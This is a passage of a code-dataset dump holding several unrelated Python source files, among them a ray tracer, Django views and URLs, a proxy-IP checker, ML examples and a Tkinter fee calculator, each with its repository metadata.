pixel_val.b\n\n\n# -------------------------------------------------Primitive classes\nclass Primitive(ABC):\n    def __init__(self, emission=BLACK):\n        self.emission = emission\n        self.BRDF = None\n\n    @abstractmethod\n    def intersect(self, ray):\n        pass\n\n    # Setters\n    def set_BRDF(self, BRDF):\n        self.BRDF = BRDF\n\n    # Getters\n    def get_BRDF(self):\n        return self.BRDF\n\n\n# Sphere\nclass Sphere(Primitive):\n    # Initializer\n    def __init__(self, sphere_origin, sphere_radius, emission=BLACK):\n        super().__init__(emission)\n        self.origin = sphere_origin\n        self.radius = sphere_radius\n        self.radius_squared = sphere_radius * sphere_radius  # optimization\n\n    # Member Functions\n    # Returns tuple of (bool hit, distance, hit_point, normal)\n    def intersect(self, ray):\n        ray_dir = Normalize(ray.d)\n        temp = np.subtract(ray.o, self.origin)\n        A = Dot(ray_dir, ray_dir)\n        B = 2.0 * Dot(ray_dir, temp)\n        C = Dot(temp, temp) - self.radius_squared\n\n        disc = (B * B) - (4.0 * A * C)  # Discriminant\n\n        if disc < 0.0:  # No Hit\n            return HitData()  # return an 'empty' HitData object (no intersection)\n\n        sqrt_disc = sqrt(disc)  # square root of discriminant\n\n        t_small = (-B - sqrt_disc) / (2.0 * A)\n        if t_small >= ray.t_min and t_small <= ray.t_max:  # Hit\n            p = ray.get_hitpoint(t_small)\n            n = Normalize((p - self.origin) / self.radius)\n            return HitData(has_hit=True, hit_point=p, normal=n, hit_distance=t_small)\n\n        t_large = (-B + sqrt_disc) / (2.0 * A)\n        if t_large >= ray.t_min and t_large <= ray.t_max:  # Hit\n            p = ray.get_hitpoint(t_large)\n            n = Normalize((p - self.origin) / self.radius)\n            return HitData(has_hit=True, hit_point=p, normal=n, hit_distance=t_large)\n\n        # Ray did not intersect sphere\n        return HitData()\n\n\n# Plane\nclass InfinitePlane(Primitive):\n    # Initializer\n    def __init__(self, plane_origin, plane_normal, emission=BLACK):\n        super().__init__(emission)\n        self.origin = plane_origin\n        self.normal = Normalize(plane_normal)\n\n    # Member Functions\n    # Returns tuple of (bool hit, distance, hit_point, normal)\n    def intersect(self, ray):\n        ray_dir = Normalize(ray.d)\n        denominator = Dot(ray_dir, self.normal)\n        if denominator == 0.0:  # Check for division by zero\n            # ray is parallel, no hit\n            return HitData()\n\n        t = Dot(self.normal, (self.origin - ray.o)) / denominator\n        if t >= ray.t_min and t <= ray.t_max:  # Hit\n            p = ray.get_hitpoint(t)\n            return HitData(has_hit=True, hit_point=p, normal=self.normal, hit_distance=t)\n\n        # Ray did not intersect plane\n        return HitData()\n\n\n# Parallelogram\nclass Parallelogram(Primitive):\n    # Initializer\n    def __init__(self, point, s1, s2, emission=BLACK):\n        super().__init__(emission)\n        self.point = point  # a corner of the parallelogram\n        self.s1 = s1  # side 1\n        self.s2 = s2  # side 2\n        self.s1_n = Normalize(s1)\n        self.s2_n = Normalize(s2)\n        self.s1_l = Length(s1)\n        self.s2_l = Length(s2)\n        self.normal = Normalize(Cross(s1, s2))\n\n    # Member Functions\n    # Returns tuple of (bool hit, distance, hit_point, normal)\n    def intersect(self, ray):\n        ray_dir = Normalize(ray.d)\n        normal_ = self.normal\n        denominator = Dot(ray_dir, normal_)\n        if denominator == 0.0:  # Check for division by zero\n            # ray is parallel, no hit\n            return HitData()\n\n        t = Dot(normal_, (self.point - ray.o)) / denominator\n        if t >= ray.t_min and t <= ray.t_max:  # Hit\n            p_hit = ray.get_hitpoint(t)\n            # Check whether p is within the square limits\n            p_ph = p_hit - self.point  # 3D vector from point to p_hit\n\n            # Project p_ph onto s1 and s2\n            p_ph_n = Normalize(p_ph)\n            p_ph_l = Length(p_ph)\n            cos_alpha1 = Dot(self.s1_n, p_ph_n)\n            
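# q1 and q2 below are the scalar projections of p_ph onto the two side\n            # directions (|p_ph| times the cosine of the angle to each side); the hit\n            # is accepted iff 0 <= q1 <= |s1| and 0 <= q2 <= |s2| (exact for\n            # orthogonal sides).\n            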
cos_alpha2 = Dot(self.s2_n, p_ph_n)\n            q1 = cos_alpha1 * p_ph_l\n            q2 = cos_alpha2 * p_ph_l\n\n            if q1 < 0.0 or q2 < 0.0 or q1 > self.s1_l or q2 > self.s2_l:\n                return HitData()\n\n            if Dot(self.normal, ray_dir) > 0:\n                normal_ = self.normal * (-1)\n            return HitData(has_hit=True, hit_point=p_hit, normal=normal_, hit_distance=t)\n\n        # Ray did not intersect plane\n        return HitData()\n\n\n# -------------------------------------------------BRDF classes\nclass BRDF(ABC):\n    @abstractmethod\n    def get_value(self, incoming, outgoing, normal):\n        pass\n\n\n# Lambertian (perfect diffuse material)\nclass Lambertian(BRDF):\n    # Initializer\n    def __init__(self, diffuse_colour):\n        self.kd = diffuse_colour * INVERTED_PI\n\n    # Member Functions\n    # wi: incoming light direction\n    def get_value(self, wi, wo, normal):\n        cos_n_wi = Dot(normal, wi)\n        if cos_n_wi > 0.0:\n            return self.kd * cos_n_wi  # Colour\n        else:\n            return BLACK\n\n\n# -------------------------------------------------Point Light Source Class\nclass PointLight:\n    def __init__(self, pos_, intensity_):\n        self.pos = pos_\n        self.intensity = intensity_\n\n\n# -------------------------------------------------Camera Class\nclass Camera:\n    # Initializer\n    def __init__(self, width_, height_, vertical_fov_):\n        self.width = width_\n        self.height = height_\n        self.vertical_fov = vertical_fov_ / 180 * PI\n        self.aspect_ratio = width_ / height_\n\n    def get_direction(self, x, y):\n        # Convert from pixel coordinates to screen space\n        x_ss = 2.0 * (x + 0.5) / self.width - 1.0\n        y_ss = 1.0 - 2.0 * (y + 0.5) / self.height\n        # Convert from screen space to camera space\n        tan_half_fov = tan(self.vertical_fov / 2.0)\n        x_cs = x_ss * tan_half_fov * self.aspect_ratio\n        y_cs = y_ss * tan_half_fov\n        p_cs = Vector3D(x_cs, y_cs, -1.0)\n        # Compute the ray direction in camera space\n        direction = Normalize(p_cs)  # because camera is always at (0,0,0)\n        return direction\n","repo_name":"MateoProjects/MAI","sub_path":"MLCG/Labs/P1_base_code_2021_2022/PyRT_Core.py","file_name":"PyRT_Core.py","file_ext":"py","file_size_in_byte":8823,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"21887662231","text":"# Bad fit\n# an example where polynomial regression would not be the best method to predict future values\n\nimport numpy\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\n\nx = [89,43,36,36,95,10,66,34,38,20,26,29,48,64,6,5,36,66,72,40]\ny = [21,46,3,35,67,95,53,72,58,10,26,34,90,33,38,20,56,2,47,15]\n\n\nmymodel = numpy.poly1d(numpy.polyfit(x, y, 3))\n\n# One should also get a very low r-squared value for a bad fit\nprint(\"R squared relationship:\", r2_score(y, mymodel(x)))\n\nmyline = numpy.linspace(2, 95, 100)\n\nplt.scatter(x, y)\n\nplt.plot(myline, mymodel(myline))\n\nplt.show()","repo_name":"eRaBxEs/MachineLearningSimplified","sub_path":"step8-polynomial_regression/poly-regression-f.py","file_name":"poly-regression-f.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74026957905","text":"from django.urls import path\nfrom . 
import views\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n    path('professor_registration/', views.professor_registration, name='professor_registration'),\n    path('professor_login/', views.professor_login, name='professor_login'),\n    path('professor_success/', views.professor_success, name='professor_success'),\n\n    path('adminong_registration/', views.adminong_registration, name='adminong_registration'),\n    path('adminong_login/', views.adminong_login, name='adminong_login'),\n    path('adminong_success/', views.adminong_success, name='adminong_success'),\n\n    path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n]\n","repo_name":"Luiiizks/Projeto-ConexaoAmor","sub_path":"usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25872792321","text":"import sys\ndef input():\n    return sys.stdin.readline().rstrip()\ndef find_parents(x):\n    if x == make_set[x]:\n        return x\n    make_set[x] = find_parents(make_set[x])\n    return make_set[x]\ndef union(x,y):\n    X = find_parents(x)\n    Y = find_parents(y)\n    if X != Y:\n        if ranks[X] < ranks[Y]:\n            X,Y = Y,X\n        make_set[Y] = X\n        if ranks[X] == ranks[Y]:\n            ranks[X] += 1\n        return True\n    return False\nN,M = map(int,input().split())\nmake_set = [i for i in range(N+1)]\nranks = [1 for _ in range(N+1)]\nanswer = 0\nfor i in range(M):\n    x,y = map(int,input().split())\n    if not union(x,y):\n        answer += 1\n\n\n\nfor i in range(1,N+1):\n    if find_parents(i) == i:\n        answer += 1\n\nanswer -= 1\nprint(answer)\n","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/20955_민서의_응급_수술_version1.py","file_name":"20955_민서의_응급_수술_version1.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34782260759","text":"\n# Import the required libraries\n\nimport streamlit as st\nfrom sklearn import datasets\nfrom sklearn.ensemble import RandomForestClassifier\n\n# Load the data from sklearn\n\niris = datasets.load_iris()\nX = iris.data\nY = iris.target\n\n# Fit the model used for prediction\n\nclf = RandomForestClassifier()\nclf.fit(X, Y)\n\n# Create the application with streamlit\n\nst.title(\"Iris Flower Classification\")\nst.header(\"Enter the measurements of the Iris flower:\")\n\n# Add the parameters\n\nsepal_length = st.slider(\"Sepal Length\", float(X[:, 0].min()), float(X[:, 0].max()), float(X[:, 0].mean()))\nsepal_width = st.slider(\"Sepal Width\", float(X[:, 1].min()), float(X[:, 1].max()), float(X[:, 1].mean()))\npetal_length = st.slider(\"Petal Length\", float(X[:, 2].min()), float(X[:, 2].max()), float(X[:, 2].mean()))\npetal_width = st.slider(\"Petal Width\", float(X[:, 3].min()), float(X[:, 3].max()), float(X[:, 3].mean()))\n\n# Define a prediction button\n\npredict_button = st.button(\"Predict\")\n\n# Display the predicted iris flower type\n\nif predict_button:\n    prediction = clf.predict([[sepal_length, sepal_width, petal_length, petal_width]])\n    target_names = iris.target_names\n    st.write(f\"Predicted Iris Flower Type: {target_names[prediction[0]]}\")\n\n","repo_name":"EOupoh76/Iris_datasetPredictor_App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31791833352","text":"#!/bin/sh\n# -*- python 
-*-\n\n################################################################################\n# This file is python 2/3 bilingual. \n# The line \"\"\":\" starts a comment in python and is a no-op in shell.\n\"\"\":\"\n# Shell code to find and run a suitable python interpreter.\nfor cmd in python3 python python2; do\n command -v > /dev/null $cmd && exec $cmd $0 \"$@\"\ndone\n\necho \"Error: Could not find a valid python interpreter --> exiting!\" >&2\nexit 2\n\":\"\"\" # this line ends the python comment and is a no-op in shell.\n################################################################################\n\n# Git Version: @git@\n\n#-----------------------------------------------------------------------\n# XALT: A tool to track the programs on a cluster.\n# Copyright (C) 2013-2017 Robert McLay and Mark Fahey\n# \n# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation; either version 2.1 of \n# the License, or (at your option) any later version. \n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details. \n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free\n# Software Foundation, Inc., 59 Temple Place, Suite 330,\n# Boston, MA 02111-1307 USA\n#-----------------------------------------------------------------------\n\nfrom __future__ import print_function\nimport os, sys, re, time\n\ndirNm, execName = os.path.split(os.path.realpath(sys.argv[0]))\nsys.path.insert(1,os.path.realpath(os.path.join(dirNm, \"../libexec\")))\nsys.path.insert(1,os.path.realpath(os.path.join(dirNm, \"../site\")))\n\nfrom progressBar import ProgressBar\n\nclass MY_FILEH(object):\n def __init__(self, fileName_pattern):\n self.__fileHandle = {}\n self.__pattern = fileName_pattern\n\n def get_file_handle(self,syshost):\n if (not syshost in self.__fileHandle):\n fn = self.__pattern + \"-\" + syshost\n self.__fileHandle[syshost] = open(fn,\"w\")\n return self.__fileHandle[syshost]\n\n def close_file_handles(self):\n for fh in self.__fileHandle:\n self.__fileHandle[fh].close()\n\n\ndef main():\n fileName = sys.argv[1]\n fileH = MY_FILEH(fileName)\n syshostPattern = re.compile(r'syshost:([^ ]*) ')\n fnSz = os.path.getsize(fileName)\n\n pbar = ProgressBar(maxVal=fnSz)\n sz = 0\n t1 = time.time()\n\n with open(fileName) as f:\n for line in f:\n sz += len(line)\n pbar.update(sz)\n m = syshostPattern.search(line)\n if (not m):\n continue\n syshost = m.group(1)\n fh = fileH.get_file_handle(syshost)\n fh.write(line)\n\n fileH.close_file_handles()\n pbar.fini()\n t2 = time.time()\n print(\"Time: \", time.strftime(\"%T\", time.gmtime(t2-t1)))\n\nif ( __name__ == '__main__'): main()\n","repo_name":"xalt/xalt","sub_path":"py_src/xalt_split_syslog_fn.in.py","file_name":"xalt_split_syslog_fn.in.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"9599002482","text":"# -*- coding: utf-8 -*-\n# vim: expandtab:tabstop=4:hlsearch\n#\n# This file is part of django-xmpp-account (https://github.com/mathiasertl/django-xmpp-account/).\n#\n# django-xmpp-account is free software: you can redistribute it and/or modify it under the terms of\n# the GNU 
General Public License as published by the Free Software Foundation, either version 3 of\n# the License, or (at your option) any later version.\n#\n# django-xmpp-account is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See\n# the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with django-xmpp-account.\n# If not, see <http://www.gnu.org/licenses/>.\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.utils.six.moves.urllib.parse import urlsplit\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import FormView\n\nfrom brake.decorators import ratelimit\n\nfrom xmpp_backends.base import UserExists\nfrom xmpp_backends.base import UserNotFound\n\nfrom core.exceptions import GpgError\nfrom core.exceptions import RateException\nfrom core.exceptions import SpamException\nfrom core.models import Address\nfrom core.models import Confirmation\nfrom core.models import UserAddresses\nfrom core.tasks import send_email\nfrom core.utils import confirm\nfrom core.utils import get_client_ip\n\nUser = get_user_model()\nlog = logging.getLogger(__name__)\n\n\nclass AntiSpamFormView(FormView):\n action_url = None\n\n def dispatch(self, request, *args, **kwargs):\n remote_ip = get_client_ip(request)\n\n if settings.DEBUG is False and remote_ip not in settings.RATELIMIT_WHITELIST:\n # create a dummy function and dynamically set its name. This way,\n # the ratelimit decorator is specific to the method in each class.\n def func(request):\n pass\n func.__name__ = str('%s_dispatch' % self.__class__.__name__)\n func = ratelimit(method='POST', rate='15/m')(func)\n ratelimit(method='GET', rate='40/m')(func)(request)\n\n if getattr(request, 'limited', False):\n raise RateException()\n\n # We sometimes get requests *without* a user agent. 
We assume these are automated requests.\n        if not request.META.get('HTTP_USER_AGENT'):\n            raise SpamException(\"No user agent passed.\")\n\n        return super(AntiSpamFormView, self).dispatch(request, *args, **kwargs)\n\n    def get_context_data(self, **kwargs):\n        context = super(AntiSpamFormView, self).get_context_data(**kwargs)\n        context['menuitem'] = getattr(self, 'menuitem', None)\n\n        # Social media\n        action_url = self.action_url\n        if action_url is not None:\n            action_url = reverse(action_url)\n        context['ACTION_URL'] = self.request.build_absolute_uri(action_url)\n        context['REGISTER_URL'] = self.request.build_absolute_uri('/')\n\n        if 'CANONICAL_HOST' in self.request.site:\n            context['ACTION_URL'] = urlsplit(context['ACTION_URL'])._replace(\n                netloc=self.request.site['CANONICAL_HOST']).geturl()\n            context['REGISTER_URL'] = urlsplit(context['REGISTER_URL'])._replace(\n                netloc=self.request.site['CANONICAL_HOST']).geturl()\n\n        context['OPENGRAPH_TITLE'] = self.opengraph_title % self.request.site\n        context['OPENGRAPH_DESCRIPTION'] = self.opengraph_description % self.request.site\n        context['TWITTER_TEXT'] = getattr(self, 'twitter_text', context['OPENGRAPH_TITLE'])\n\n        form = context['form']\n        if settings.GPG and hasattr(form, 'cleaned_data') and 'gpg_key' in form.fields:\n            if form['gpg_key'].errors or form['fingerprint'].errors or \\\n                    form.cleaned_data.get('fingerprint') or form.cleaned_data.get('gpg_key'):\n                context['show_gpg'] = True\n        return context\n\n    def get_form_kwargs(self):\n        kwargs = super(AntiSpamFormView, self).get_form_kwargs()\n\n        if 'username' in self.form_class.declared_fields:\n            kwargs['initial']['username'] = '@%s' % self.request.site['DOMAIN']\n        return kwargs\n\n    def form_valid(self, form):\n        return self.render_to_response(self.get_context_data(form=form))\n\n\nclass ConfirmationView(AntiSpamFormView):\n    user_not_found_error = _(\"User not found (or false password provided)!\")\n\n    def handle_valid(self, form, user):\n        \"\"\"By default, the user's current fingerprint is the payload.\"\"\"\n\n        return {\n            'gpg_fingerprint': user.gpg_fingerprint,\n            'username': user.node,\n            'domain': user.domain,\n        }\n\n    def handle_gpg(self, form, user):\n        if not settings.GPG:\n            return {}  # shortcut\n\n        if form.cleaned_data.get('fingerprint'):\n            fingerprint = form.cleaned_data['fingerprint']\n\n            return {'gpg_fingerprint': fingerprint, }\n        elif 'gpg_key' in self.request.FILES:\n            path = self.request.FILES['gpg_key'].temporary_file_path()\n            with open(path) as stream:\n                data = stream.read()\n            return {'gpg_key': data, }\n        else:\n            return {'gpg_fingerprint': None, }\n\n    def form_valid(self, form):\n        try:\n            user = self.get_user(form.cleaned_data)\n            payload = self.handle_valid(form, user)\n        except GpgError as e:\n            form.add_error(e.field, e.message)\n            return self.form_invalid(form)\n        except User.DoesNotExist:\n            form.add_error(None, self.user_not_found_error)\n            return self.form_invalid(form)\n        except UserNotFound as e:\n            if e.args and e.args[0]:\n                form.add_error(None, e.args[0].encode('utf-8'))\n            else:\n                form.add_error(None, self.user_not_found_error)\n            return self.form_invalid(form)\n\n        # log user address:\n        address = Address.objects.get_or_create(address=self.request.META['REMOTE_ADDR'])[0]\n        UserAddresses.objects.create(address=address, user=user, purpose=self.purpose)\n\n        # Send confirmation email to the user\n        key, kwargs = confirm(self.request, user, purpose=self.purpose, payload=payload)\n        if settings.BROKER_URL is None:\n            key.send(**kwargs)\n        else:\n            send_email.delay(key_id=key.pk, **kwargs)\n\n        return 
super(ConfirmationView, self).form_valid(form)\n\n\nclass ConfirmedView(AntiSpamFormView):\n    user = None\n\n    def dispatch(self, request, *args, **kwargs):\n        if request.META.get('HTTP_USER_AGENT', '').startswith('Twitterbot'):\n            return HttpResponseRedirect(reverse(self.action_url))\n        return super(ConfirmedView, self).dispatch(request, *args, **kwargs)\n\n    def after_delete(self, data):\n        pass\n\n    def get_context_data(self, **kwargs):\n        context = super(ConfirmedView, self).get_context_data(**kwargs)\n        if self.user is not None:\n            context['username'] = self.user.node\n            context['domain'] = self.user.domain\n            context['jid'] = self.user.jid\n        return context\n\n    def form_valid(self, form):\n        try:\n            key = Confirmation.objects.valid().filter(\n                purpose=self.purpose).get(key=self.kwargs['key'])\n        except Confirmation.DoesNotExist:\n            form.add_error(None, _(\"Confirmation key expired or not found.\"))\n            return self.form_invalid(form)\n        self.user = key.user\n\n        try:\n            self.handle_key(key, form)\n            key.delete()\n            self.after_delete(form.cleaned_data)\n        except UserNotFound as e:\n            if e.message:\n                form.add_error(None, _(\"User not found: %s\") % e.message)\n            else:\n                form.add_error(None, _(\"User not found!\"))\n            return self.form_invalid(form)\n        except UserExists:\n            form.add_error(None, _(\"User already exists!\"))\n            return self.form_invalid(form)\n\n        return super(ConfirmedView, self).form_valid(form)\n","repo_name":"mathiasertl/django-xmpp-account","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"14258590891","text":"import requests\nimport pymysql\n\n\nclass GetIp(object):\n    \"\"\"Fetch usable IPs from the database for the crawler to use\"\"\"\n    conn = pymysql.connect(host=\"127.0.0.1\", user=\"root\", password=\"root\", db=\"outback\")\n    cursor = conn.cursor()\n\n    def get_random_ip(self):\n        select_sql = \"select ip,port,type from ip_proxy ORDER by rand() limit 1\"\n\n        result = self.cursor.execute(select_sql)\n        for ip_info in self.cursor.fetchall():\n            ip = ip_info[0]\n            port = ip_info[1]\n            type = ip_info[2].lower()\n            judge_result = self.judge_ip(type, ip, port)\n            if judge_result:\n                # Do not close the connection here: every request goes and fetches\n                # an IP, and closing it would allow only a single fetch\n                # self.cursor.close()\n                # self.conn.close()\n\n                return \"{0}://{1}:{2}\".format(type, ip, port)\n            else:\n                return self.get_random_ip()\n\n    def judge_ip(self, type, ip, port):\n        baidu = \"https://www.baidu.com\"\n        proxy_url = \"{0}://{1}:{2}\".format(type, ip, port)\n        try:\n            proxy_dict = {type:proxy_url,}\n            response = requests.get(baidu, proxies=proxy_dict)\n        except Exception as e:\n            print(\"invalid ip or port\")\n            self.delete_ip(ip)\n            return False\n        else:\n            code = response.status_code\n            if code >= 200 and code < 300:\n                print(\"effective ip, the ip is\", proxy_url)\n                return True\n            else:\n                print(\"invalid ip\")\n                self.delete_ip(ip)\n                return False\n\n    def delete_ip(self, ip):\n        delete_sql = \"\"\"delete FROM ip_proxy where ip='{0}'\"\"\".format(ip)\n        try:\n            self.cursor.execute(delete_sql)\n            self.conn.commit()\n        except Exception as e:\n            print(e)\n\n\n\nif __name__ == \"__main__\":\n    get_ip = GetIp()\n    ip = get_ip.get_random_ip()\n    print(ip)\n","repo_name":"cosmosy-z/taobao","sub_path":"taobao/tools/get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21022270394","text":"import os\nimport numpy as np\nimport datetime\nimport time\nimport data\n#from 
objax.functional.loss import cross_entropy_logits_sparse\nimport jax.numpy as jnp\nfrom jax import pmap, host_id, jit\nfrom jax.tree_util import tree_map\n\n\ndef DTS():\n return datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n\n\ndef ensure_dir_exists(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef ensure_dir_exists_for_file(fname):\n ensure_dir_exists(os.path.dirname(fname))\n\n\ndef shard(x):\n # pmap x across first axis\n return pmap(lambda v: v)(x)\n\n\ndef replicate(x, replicas=8):\n # replicate x and then shard\n replicated = jnp.stack([x] * replicas)\n return shard(replicated)\n\n\ndef shapes_of(pytree):\n # rebuild a pytree swapping actual params for just shape and type\n return tree_map(lambda v: (v.shape, type(v)), pytree)\n\n\ndef reshape_leading_axis(x, s, from_axis=1):\n return x.reshape((*s, *x.shape[from_axis:]))\n\n\ndef primary_host():\n return host_id() == 0\n\n\nclass EarlyStopping(object):\n def __init__(self, patience=3, burn_in=5, max_runtime=None,\n smoothing=0.0):\n # smoothing = 0.0 => no smoothing\n\n self.original_patience = patience\n self.patience = patience\n self.burn_in = burn_in\n self.lowest_value = None\n\n self.decided_to_stop = False\n if max_runtime is not None:\n self.exit_time = time.time() + max_runtime\n else:\n self.exit_time = None\n\n if smoothing < 0.0 or smoothing > 1.0:\n raise Exception(\"invalid smoothing value %s\" % smoothing)\n self.smoothing = 1.0 - smoothing\n self.smoothed_value = None\n\n def should_stop(self, value):\n # if we've already decided to stop then return True immediately\n if self.decided_to_stop:\n return True\n\n # calc smoothed value\n if self.smoothed_value is None:\n self.smoothed_value = value\n else:\n self.smoothed_value += self.smoothing * \\\n (value - self.smoothed_value)\n\n # run taken too long?\n if self.exit_time is not None:\n if time.time() > self.exit_time:\n self.decided_to_stop = True\n return True\n\n # ignore first burn_in iterations\n if self.burn_in > 0:\n self.burn_in -= 1\n return False\n\n # take very first value we see as the lowest\n if self.lowest_value is None:\n self.lowest_value = self.smoothed_value\n\n # check if we've made an improvement; if so reset patience and record\n # new lowest\n made_improvement = self.smoothed_value < self.lowest_value\n if made_improvement:\n self.patience = self.original_patience\n self.lowest_value = self.smoothed_value\n return False\n\n # if no improvement made reduce patience. 
if no more patience exit.\n        self.patience -= 1\n        if self.patience == 0:\n            self.decided_to_stop = True\n            return True\n        else:\n            return False\n\n    def stopped(self):\n        return self.decided_to_stop\n\n\ndef accuracy(predict_fn, dataset):\n    num_correct = 0\n    num_total = 0\n    for imgs, labels in dataset:\n        predictions = predict_fn(imgs)\n        num_correct += jnp.sum(predictions == labels)\n        num_total += len(labels)\n    accuracy = num_correct / num_total\n    return accuracy\n","repo_name":"matpalm/ensemble_net","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"22714552151","text":"import numpy as np\nimport pandas as pd\nfrom keras.preprocessing.image import load_img\nfrom skimage.transform import resize\n\nimg_size_ori = 101\nimg_size_target = 128\n\ndef upsample(img):\n    if img_size_ori == img_size_target:\n        return img\n    return resize(img, (img_size_target, img_size_target), mode='constant', preserve_range=True)\n\nfold = 4\ntrain_fold = f'../folds/train_fold_{fold}.csv'\nvalid_fold = f'../folds/valid_fold_{fold}.csv'\n\ntrain_df = pd.read_csv(train_fold, index_col=\"id\", usecols=[0])\nvalid_df = pd.read_csv(valid_fold, index_col=\"id\", usecols=[0])\ndepths_df = pd.read_csv(\"../../input/depths.csv\", index_col=\"id\")\ntrain_df = train_df.join(depths_df)\ntest_df = depths_df[~depths_df.index.isin(train_df.index) & ~depths_df.index.isin(valid_df.index)]\n\nx_test = np.array(\n    [upsample(np.array(load_img('../../input/test/images/{}.png'.format(idx), color_mode='grayscale'))) / 255 for idx in\n     test_df.index]).reshape(-1, 128, 128, 1)\na = 1","repo_name":"igorsoldatov/tgs_salt","sub_path":"unet_resnet/unet_resnet_v3/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4612245656","text":"# text to be entered by user\ntext = input('Enter text:')\n\n\ndef backward(string):\n    \"\"\"\n    This function reverses words longer\n    than 3 characters in a string\n    :param string: string entered by user\n    :return: string with longer words reversed; words\n    of 3 characters or fewer are kept as-is\n    \"\"\"\n    string = string.split()\n    words = []\n    for word in string:\n        if len(word) > 3:\n            words.append(word[::-1])\n        else:\n            words.append(word)\n\n    words = ' '.join(words)\n    return words\n\n\nif __name__ == '__main__':\n    result = backward(text)\n    print(result)\n","repo_name":"jadamowi/PAT_interview","sub_path":"stringBackward.py","file_name":"stringBackward.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30477553293","text":"'''\nCreate a variable named compnum and assign it the value 50.\nAsk the user to enter a number. While the guess does not match the value of compnum,\ntell them whether it is higher or lower than compnum, and ask them to enter another number.
If the entered value matches compnum, print the message \"Well done, you took [attempts] attempts\".\n'''\n\ncompnum = 50\nanswer = 'y'\nnum = int(input('Enter the number: '))\nattempts = 1\n\n\nwhile num != compnum:\n    if num < compnum:\n        print('Low')\n    else:\n        print('High')\n    attempts += 1\n    num = int(input('Another number: '))\nprint('Well done, you took', attempts, 'attempts')\n\n\n","repo_name":"Mikopashpe/Python_Exercises","sub_path":"Ex049_cycle_while.py","file_name":"Ex049_cycle_while.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26855672589","text":"from tkinter import *\nfrom tkinter import ttk\n\n# Formula\n# Investible amount / Unit price of share = Number of shares (input)\n# No. of Shares X Unit Price of Share = Investible Amount (calculate)\n# No. of Shares X Commission Per Share (default 0.1$) + Fixed Commission Amount (default 3$) = Total Commission Amount (calculate)\n# Investible Amount + Total Commission Amount = Total Invested Plus Fee Cost (final output)\n#\n# Worked example: $1000 / $50 = 20 shares; 20 x $0.1 + $3 = $5 commission;\n# $1000 + $5 = $1005 total invested plus fee cost.\n\n\nclass GUI(object):\n\n    def __init__(self, window):\n        self.window = window\n        self.window.wm_title(\"Trade fee Calculator\") \n        self.balanceLabel = ttk.Label( window, text = \"Balance\")\n        self.investiableLabel = ttk.Label(window, text=\"Amount to Invest $\")\n        self.unitSharePriceLabel = ttk.Label(window, text=\"Unit price of share\")\n        self.shareNumberLabel = ttk.Label(window, text=\"Number of shares\")\n        self.shareCommissionLabel = ttk.Label(window, text=\"Commission Per Share $\")\n        self.fixedCommissionLabel = ttk.Label(window, text=\"Fixed Commission Amount $\")\n        self.totalCommissionLabel = ttk.Label(window, text=\"Total Commission Amount $\")\n        self.totalInvestedCostLabel = ttk.Label(window, text= \"Total Invested Plus Fee Cost $\")\n        self.balanceAfterLabel = ttk.Label(window, text=\"Balance after\")\n\n        self.balanceEntry = ttk.Entry()\n        self.investiableEntry = ttk.Entry()\n        self.unitSharePriceEntry = ttk.Entry()\n        self.shareNumberEntry = ttk.Entry()\n        self.shareCommissionEntry = ttk.Entry()\n        self.shareCommissionEntry.insert(0,'0.1')\n        self.fixedCommissionEntry = ttk.Entry()\n        self.fixedCommissionEntry.insert(0,'3')\n        self.totalCommissionEntry = ttk.Entry()\n        self.totalInvestedCostEntry = ttk.Entry()\n        self.balanceAfterEntry = ttk.Entry()\n\n        self.buttoncalNumShares = ttk.Button(window, text=\"Calculate 